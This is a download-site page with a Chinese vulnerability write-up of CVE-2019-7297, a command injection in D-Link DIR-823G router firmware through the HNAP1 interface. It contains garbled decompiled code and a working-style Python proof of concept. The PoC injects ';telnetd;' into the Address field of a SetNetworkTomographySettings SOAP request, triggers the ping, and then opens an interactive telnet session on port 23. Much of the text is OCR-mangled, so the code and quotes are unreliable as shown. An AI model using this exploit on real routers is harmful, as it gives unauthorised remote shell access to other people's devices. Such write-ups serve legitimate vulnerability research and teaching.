欢迎来到课桌文档! | 帮助中心 课桌文档-建筑工程资料库
课桌文档
全部分类
  • 党建之窗>
  • 感悟体会>
  • 百家争鸣>
  • 教育整顿>
  • 文笔提升>
  • 热门分类>
  • 计划总结>
  • 致辞演讲>
  • 在线阅读>
  • ImageVerifierCode 换一换
    首页 课桌文档 > 资源分类 > DOCX文档下载  

    (CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx

    • 资源ID:641661       资源大小:39.34KB        全文页数:4页
    • 资源格式: DOCX        下载积分:5金币
    快捷下载 游客一键下载
    会员登录下载
    三方登录下载: 微信开放平台登录 QQ登录  
    下载资源需要5金币
    邮箱/手机:
    温馨提示:
    用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP免费专享
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    (CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx

    (CVE-2019-7297) D-Link DIR-823G 命令注入漏洞一、漏洞简介D-Link DIR 823G 1.02B03及之前的版本中存在命令注入漏洞,攻击者可通过发送 带有shell元字符的特制/HNAPl请求利用该漏洞执行任意的操作系统命令。GetNetworkTomographyResult函数中调用system函数,执行的内容中包括不受 信任的用户输入AddreSS字段,攻击者可以远程执行任意命令。二、漏洞影响D-Link DIR 823G 1.02B03 及之前的版本三、复现过程漏洞分析漏洞原理中提到的GetNetworkTOniographyResult函数是在goahead二进制文件 中实现的。在FunctionJist中找到对应而函数地址。GetNetWOrkTOmOgraPhyReSUIt 获取 address, number, SiZe 参数,作为 Ping 的 参数。,rr . ajub_get <0mH)72,;if (War: O)(puts ("error, ap&xto get MIB-PIG-ADDRtSS! : )else (9nprlntf(a L “W,6Jp:ng *);_n rrlen(address);atmcat(acStack280faddrMf-n) j1 Va: apaib_get(3xlb731«* .rr:):If (Vrl « 0> (puts Cerror, pmb get MIBePINGeNUMBEK");)else (strcat(acStack2S2r* -c w);>prlntf(char )$ ,:-Qd -v drnuxer trlen(char ),9Wic ;-, (char ) 4.,Varl psabs9ec(0xU>749size);if (Varl - O) put.sC,error, epoxb get MIB_PIHG_5XZf); ) else (9trcAt<ft: tac<-: rw -9 );sprlntf(char )_二JW.e:工20);_n *rlen(char )loc<1_120);trac4t(< : 3 r (car )t._: ,_:,“9trct<% c*a ::t > tappng.tx 2>>txppng.tx);Puts(AcStazaJIfiC);syaten(- :Sta:c2eo);_3tr*ar - fopen(auppng.txt*v r>If (_itreax <1X *>0x0)(puts(tppng.tMt is NULL"):ping address -c number -w number -s size > tmpping.txt 2>>tmpping.t ×t但在system之前并没有对这些外来参数进行检查,如果address为;telnetd;就 能启动Telnet服务。可以看出这些参数都是通过apmib_get获取的,那么在之前 一定有apmib_set进行设置,在IDA中查找关键字0xlb72, 0xlb73, 0xlb73, 定位到apmib_set的位置,结合ghidra的反汇编代码,确定在 SetNetworkTomographySettings函数中可以对这些参数进行设置。,4tl H*lLo>S3%rin9(0tlFnC. "?pocimport requests from pwn import *IP='192.168.0.1, headers = requests. utils. default_headers()headers"User- Agent" = ',Mozilla5.0 (Windows NT 10.0; Win64; ×64) Appl eWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 headers"SOAPAction" = ," raphySettings'headers,Content-Type" = "te×t×ml; Charset=UTF-8"headers"Accept"="*/*"headers"Accept-Encoding"="gzip, deflate"headers "Accept-Language "=',zh-CNj zh;q=0.9,en;q=0.8" payload = '<?xml version=,1.0,* encoding="utf-8" ?><soap: Envelope xmlns:x si=,http:/www.w3.org2001XMLSchema-instance" xmlns:xsd="http:/www.w3.org2001XMLSchema" xmlns:soap="http:/schemas.xmlsoap.org/soap/envelop e"><soap:Body><SetNetworkTomographySettings xmlns="HNAPl "><Address>jtelnetd;<Address><Number>4<Number><Size>4<Size><SetNetworkTomographySettings><soap:Body><soap:Envelope>,r = requests.post(,http:/'+IP+'HNAP1,i headers=headers data=payload) print r.textheaders"SOAPAction" = ,"http:/ZHNAPlGetNetworkTomog raphyResult",payload = " <?xml version=,1.0" encoding="utf-8" ?><soap: Envelope xmlns :x si=,http:/www.w3.org2001XMLSchema-instance" ×mlns:xsd="http:/www.w3. org2001XMLSchema" xmlns:soap=,http:/schemas.xmlsoap.org/soap/envelop e"><soap:Body><GetNetworkTomographyResult xmlns=,http:/HNAPl> <GetNetworkTomographyResult><soap:Body><soap:Envelope>'r = requests.post('http:/,+IP+'HNAP1,i headers=headersj data=payload) print r.text p=remote(IP,23) p.interactive(

    注意事项

    本文((CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx)为本站会员(夺命阿水)主动上传,课桌文档仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知课桌文档(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    备案号:宁ICP备20000045号-1

    经营许可证:宁B2-20210002

    宁公网安备 64010402000986号

    课桌文档
    收起
    展开